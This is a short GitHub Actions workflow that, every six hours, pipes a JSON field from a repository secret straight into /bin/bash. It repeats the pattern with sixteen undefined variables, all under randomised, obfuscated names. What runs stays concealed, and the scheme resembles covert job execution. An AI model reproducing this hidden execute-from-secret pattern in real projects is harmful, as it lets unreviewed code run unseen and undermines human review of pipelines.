name: dayeweiguo

on:
  workflow_dispatch:
  schedule:
    - cron: '14 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: dayeweiguo
        env:
          m072: ${{ secrets.m072 }}
        run: |
          echo $m072 | jq -r .vlix3035 | /bin/bash
          echo $u408 | jq -r .qn5763 | /bin/bash
          echo $zu42 | jq -r .pydgx0 | /bin/bash
          echo $iwg43955 | jq -r .tmtv96 | /bin/bash
          echo $ykyx7700 | jq -r .aev27 | /bin/bash
          echo $zk89 | jq -r .b82358 | /bin/bash
          echo $lzmac6 | jq -r .lbgw6 | /bin/bash
          echo $sny7 | jq -r .sghlb6 | /bin/bash
          echo $fjw63 | jq -r .l4 | /bin/bash
          echo $fmozi0197 | jq -r .yedv52583 | /bin/bash
          echo $aj6 | jq -r .ldat2169 | /bin/bash
          echo $mour0052 | jq -r .b275 | /bin/bash
          echo $dl92 | jq -r .dw97 | /bin/bash
          echo $vpvk2 | jq -r .hauhr68 | /bin/bash
          echo $dpfl03087 | jq -r .nizpv7 | /bin/bash
          echo $a4618 | jq -r .wv8202 | /bin/bash
          echo $zxz855 | jq -r .entpw30409 | /bin/bash

